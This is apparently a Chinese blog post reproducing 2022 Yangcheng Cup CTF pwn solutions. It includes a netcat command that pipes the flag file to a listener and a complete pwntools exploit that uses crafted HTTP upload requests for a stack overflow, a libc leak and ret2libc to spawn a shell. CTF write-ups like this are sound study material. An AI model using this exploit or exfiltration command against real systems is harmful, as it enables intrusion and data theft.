---
title: 2022 羊城杯 pwn 复现
date: 2022-11-07 19:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=48/
pin: false
published:
---

## YCBSQL

<img src="https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221107203502757.png" alt="image-20221107203502757" style="zoom:50%;" />

翻了下文件的函数，似乎有能直接调用shell的部分，用vps连

```bash
.system nc 127.0.0.1 9999 </flag
```

![image-20221107202902731](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221107202902731.png)

![image-20221107205523823](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221107205523823.png)

## fakeNoOutput

![image-20221107213147100](https://e4l4pic.oss-cn-beijing.aliyuncs.com/img/image-20221107213147100.png)

```python
# _*_ coding:utf-8 _*_
from pwn import *
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

context.log_level = "debug"
context.arch = "i386"
context.terminal = ['tmux', 'splitw', '-h']

# p = remote("","")
p = process("./fakeNoOutput")
elf = ELF("./fakeNoOutput")
# libc = ELF("./libc.so.6")
libc = elf.libc

def dbg():
    gdb.attach(p)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
#-----------------------------------------------------------------------------------------

py1 = 'Content:filename=aaaa\n'
py2 = 'b' * 0x1044 + flat([0x80496A1, 0x08049022, 0x804D040, 0x8049F77]) + '\n'

payload1 = '''POST /upload HTTP/1.1
Host: localhost
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: {}
HTTP_SERVER1_token: wR5qH796Ky8D03r2W7syLB7406e30xP7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/104.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,en-US;q=0.6,zh-TW;q=0.5
If-None-Match: W/"62af197d-a954"
If-Modified-Since: Sun, 19 Jun 2022 12:41:33 GMT

'''.format(len(py1) + len(py2)).replace('\n', '\r\n').encode()

payload2 = '''POST /upload HTTP/1.1
Host: localhost
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: {}
HTTP_SERVER1_token: 5lnPP74OkC4N9U8smBU812Smk1XxvRBJ
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/104.0.0.0 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,en-US;q=0.6,zh-TW;q=0.5
If-None-Match: W/"62af197d-a954"
If-Modified-Since: Sun, 19 Jun 2022 12:41:33 GMT

'''.format(len(py1) + len(py2)).replace('\n', '\r\n').encode()

p.send(payload1)
p.send(py1)
p.send(py2)
p.recvuntil('close\r\n\r\n')
p.recvuntil('close\r\n\r\n')
libc_addr = u32(p.recv(4)) - libc.sym['fprintf']
success('libc_addr: ' + hex(libc_addr))
py3 = 'b' * 0x1044 + flat([libc_addr + libc.sym['system'], 0x08049022, libc_addr+ next(libc.search('/bin/sh')), 0x8049F77]) + '\n'
p.send(payload2)
p.send(py1)
p.send(py3)

ia()
```

## ez_linklist

